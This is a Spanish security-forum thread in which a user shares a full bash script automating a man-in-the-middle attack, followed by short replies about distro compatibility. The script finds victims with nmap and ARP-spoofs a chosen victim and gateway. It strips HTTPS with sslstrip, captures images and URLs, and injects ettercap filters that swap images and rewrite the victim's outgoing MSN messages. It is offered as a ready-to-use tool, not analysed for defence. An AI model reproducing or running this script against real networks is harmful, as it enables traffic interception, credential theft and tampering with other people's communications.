Seguridad Wireless - Wifi

Sistemas operativos => Zona GNU/Linux => Mensaje iniciado por: aqqle en 19-04-2013, 16:13 (Viernes)

Título: Script automatizado para ataque MITM
Publicado por: aqqle en 19-04-2013, 16:13 (Viernes)
Muy buenas señores, os traigo este script que seguro os va a gustar!!

Saludos!

Código: [Seleccionar]
#!/bin/sh
quit="no"
configuracion_todo () {
clear
echo "------------------------------------------------"
echo "Creando los filtros para ettercap..."
echo "------------------------------------------------"
sleep 1
echo "if (ip.proto == TCP && tcp.dst == 1863) {" > mitmsg.filter
echo "if (search(DATA.data, \"MSG\")) {" >> mitmsg.filter
echo "replace(\"beso\", \"kaka\");" >> mitmsg.filter
echo "msg(\"Modificando paquete ;)\\n\");" >> mitmsg.filter
echo "   }" >> mitmsg.filter
echo "}" >> mitmsg.filter
echo "if (ip.proto == TCP && tcp.dst == 80) {" > mitm.filter
echo "if (search(DATA.data, \"Accept-Encoding\")) {" >> mitm.filter
echo "replace(\"Accept-Encoding\", \"Accept-Rubbish!\");" >> mitm.filter
echo "# note: replacement string is same length as original string" >> mitm.filter
echo "msg(\"zapped Accept-Encoding!\\n\");" >> mitm.filter
echo "   }" >> mitm.filter
echo "}" >> mitm.filter
echo "if (ip.proto == TCP && tcp.src == 80) {" >> mitm.filter
echo "replace(\"img src=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "replace(\"IMG SRC=\", \"img src=\\"imagenfalsa\\" \");" >> mitm.filter
echo "msg(\"Filter Ran. \\n\");" >> mitm.filter
echo "}" >> mitm.filter
echo "--------------------------------------------> OK"
echo ""
sleep 1
echo "------------------------------------------------"
echo "Configurar equipo para el ataque MITM"
echo "------------------------------------------------"
sleep 1
echo "Verificando los paquetes necesarios..."
echo "------------------------------------------------"
echo "xterm"
verificacion=$(aptitude show xterm | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "xterm ya está instalado"
else
echo "xterm no está instalado, INSTALANDO..."
sleep 1
sudo apt-get --force-yes install xterm &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "sslstrip"
verificacion=$(aptitude show sslstrip | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "sslstrip ya está instalado"
else
echo "sslstrip no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install sslstrip &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "ettercap"
verificacion=$(dpkg --get-selections | grep -w ettercap-common | grep -w install | awk '{print $2}')
if [ "$verificacion" = "install" ]; then
echo "ettercap ya está instalado"
else
echo "ettercap no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install ettercap &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "dsniff"
verificacion=$(aptitude show dsniff | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "dsniff ya está instalado"
else
echo "dsniff no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install dsniff &
fi
echo "--------------------------------------------> OK"
sleep 1
echo "driftnet"
verificacion=$(aptitude show driftnet | grep Estado | awk '{print $2}')
if [ "$verificacion" = "instalado" ]; then
echo "driftnet ya está instalado"
else
echo "driftnet no está instalado, INSTALANDO..."
sleep 1
xterm -e sudo apt-get --force-yes install driftnet &
fi
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo ""
echo "Verificación de paquetes finalizada..."
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 1
echo "Activando ip_forward"
xterm -e echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
echo "--------------------------------------------> OK"
sleep 1
echo "Configurando iptables"
xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "--------------------------------------------> OK"
sleep 2
echo "Indica tu interface de red:"
echo "Ej: wlan0, eth1 ..."
echo ""
iwconfig
echo "------------------------------------------------"
interface=$(zenity --entry \
--title=".:MITM:." \
--text="Indica tu interface de red:" \
--text="(ej: wlan0, eth1, etc...)" \
)
sleep 1
echo ""
echo "--------------------------------------------> OK"
sleep 2
}
busc_victima () {
clear
echo "------------------------------------------------"
echo "Buscar víctima..."
echo "------------------------------------------------"
sleep 1
echo ""
echo "Mostrando tu dirección ip:"
sleep 1
tuip=$(ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20)
ifconfig $interface | grep 'Direc. inet:' | awk '{print $2}' | cut --characters=6-20
echo "------------------------------------------------"
echo "Indica el rango a escanear (ej: 192.168.0.* )"
echo "------------------------------------------------"
rango=$(zenity --entry \
--title="Rango a escanear por nmap .:MITM:." \
--text="Indica el rango a escanear" \
--text="Tu ip es:" \
--text="$tuip" \
)
sleep 1
echo "------------------------------------------------"
echo "Mostrando lista de usuarios conectados a la red"
echo "------------------------------------------------"
sleep 1
xterm -T "Lista de usuarios conectados a la red .:MITM:." -n "AQQLE .:MITM:."-hold -e nmap -sP $rango --system-dns &
}
inic_mitm () {
clear
echo "------------------------------------------------"
echo "Iniciar ataque MITM"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Iniciando sslstrip"
xterm -hold -e sslstrip -a -k -f &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando arpspoof"
echo "Indica la ip de la puerta de enlace:"
echo "------------------------------------------------"
penlaces=$(zenity --entry \
--title="Iniciando arpspoof .:MITM:." \
--text="Indica la ip de la puerta de enlace:" \
--text="ej: 192.168.0.1" \
)
sleep 1
echo "------------------------------------------------"
echo "Indica la ip de la víctima:"
echo "------------------------------------------------"
victima=$(zenity --entry \
--title="Iniciando arpspoof .:MITM:." \
--text="Indica la ip de la víctima" \
)
sleep 1
xterm -hold -e arpspoof -i $interface -t $victima $penlaces &
echo "--------------------------------------------> OK"
sleep 3
echo ""
echo "Iniciando ettercap"
xterm -hold -e sudo ettercap -T -q -i $interface &
echo "--------------------------------------------> OK"
sleep 1
echo ""
echo "Iniciando driftnet"
sleep 10
xterm -hold -e driftnet -i $interface &
echo "--------------------------------------------> OK"
echo ""
echo "Iniciando urlsnarf"
sleep 1
xterm -hold -e urlsnarf -i $interface &
echo "--------------------------------------------> OK"
sleep 2
}
salida_x () {
clear
sleep 2
echo "Desactivando ip_forward"
xterm -e echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward &
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Eliminando posibles filtros creados"
echo""
nohup rm imagen.ef
nohup rm msg.ef
echo ""
echo "--------------------------------------------> OK"
sleep 2
echo ""
echo "Configurando etter.conf"
xterm -e sudo sed -ie 's/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
xterm -e sudo sed -ie 's/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/g' /etc/etter.conf &
echo "--------------------------------------------> OK"
sleep 2
rm mitm.filter
rm mitmsg.filter
rm nohup.out
clear
}
camb_imagen () {
clear
echo "------------------------------------------------"
echo "Cambiar imagenes"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica la dirección de la imagen falsa:"
echo "Ej: http://www.arcpujol.com/construccio.jpg"
echo "------------------------------------------------"
direccionfalsa=$(zenity --entry \
--title="Construyendo filtro .:MITM:." \
--text="Indica la dirección de la imagen falsa:" \
--text="Ej: http://www.pagweb/imagen.jpg" \
)
xterm -e sudo sed -ie 's/imagenfalsa/'$direccionfalsa'/g' mitm.filter &
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitm.filter -o imagen.ef &
echo "--------------------------------------------> OK"
rm mitm.filter
mv mitm.filtere mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F imagen.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
camb_msn () {
clear
echo "------------------------------------------------"
echo "Cambiar los mensajes salientes de msn"
echo "------------------------------------------------"
sleep 1
echo ""
echo "Indica primero qué palabra quieres cambiar"
echo "Ej: hola"
echo "------------------------------------------------"
convfalsa=$(zenity --entry \
--title="Creando filtro ettercap .:MITM:." \
--text="Indica primero qué palabra quieres cambiar" \
)
cp mitmsg.filter mitmsg.filter1
xterm -e sudo sed -ie 's/beso/'$convfalsa'/g' mitmsg.filter &
echo ""
rm mitmsg.filtere
echo "Indica la palabra que sustituirá a la anterior"
echo "Ej: perra"
echo "------------------------------------------------"
convfalsa1=$(zenity --entry \
--title="Creando filtro ettercap .:MITM:." \
--text="Indica la palabra que sustituirá a la anterior" \
)
xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter &
rm mitmsg.filtere
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitmsg.filter -o msg.ef &
echo "--------------------------------------------> OK"
rm mitmsg.filter
mv mitmsg.filter1 mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}
while [ $quit != "yes" ]
do
clear
echo "------------------------------------------------"
echo "     AQQLE  /     AQQLE /    AQQLE /     AQQLE/"
echo "AQQLE/     /AQQLE/     /AQQLE /   /AQQLE/    /"
echo "    / AQQLE     /AQQLE/      /AQQLE    / AQQLE"
echo "------------------------------------------------"
echo ""
echo ""
echo "Menú de opciones MITM"
echo "================================================"
echo "*   Configuración necesaria para el ataque MITM"
echo "------------------------------------------------"
echo "*   Buscar víctima"
echo "*   Iniciar ataque MITM"
echo "*   Cambiar las imagenes entrantes a la víctima"
echo "*   Cambiar las conversaciones de msn salientes"
echo "------------------------------------------------"
echo "*   Salir"
echo "------------------------------------------------"
echo ""
echo -n "Escoje acción"

eleccion=$(zenity --list --column "Opciones:" "Configuración" "Buscar víctima" "Iniciar ataque MITM" "Cambiar imagenes entrantes" "Cambiar conversaciones salientes" "Salir" --text "Escoje acción:" --title="Menú .:MITM:. por aqqle" --height=245 --width=250)

if [ "$eleccion" = "Configuración" ]; then
configuracion_todo;

elif [ "$eleccion" = "Buscar víctima" ]; then
busc_victima;

elif [ "$eleccion" = "Iniciar ataque MITM" ]; then
inic_mitm;

elif [ "$eleccion" = "Cambiar imagenes entrantes" ]; then
camb_imagen;
elif [ "$eleccion" = "Cambiar conversaciones salientes" ]; then
camb_msn;
elif [ "$eleccion" = "Salir" ]; then
salida_x;
quit="yes";
else
exit 0
fi
done
Título: Re: Script automatizado para ataque MITM
Publicado por: geminis_demon en 19-04-2013, 16:43 (Viernes)
Hola, gracias por el script.

Aunque antes de que alguien intente ejecutarlo en Wifislax y empiecen a comentar que no funciona, sería bueno avisar de que solo es funcional en distribuiciones linux basadas en debian, lo digo por eso de "aptitude" y "apt-get".

Un saludo.
Título: Re: Script automatizado para ataque MITM
Publicado por: aqqle en 19-04-2013, 16:47 (Viernes)
Si, tienes razón, yo lo uso en bugtraq (ubuntu) sin problema  8)
Título: Re: Script automatizado para ataque MITM
Publicado por: Chumpy en 21-04-2013, 18:35 (Domingo)
Pues si no te es mucha molestia avisaló al principio de tu post!  ;)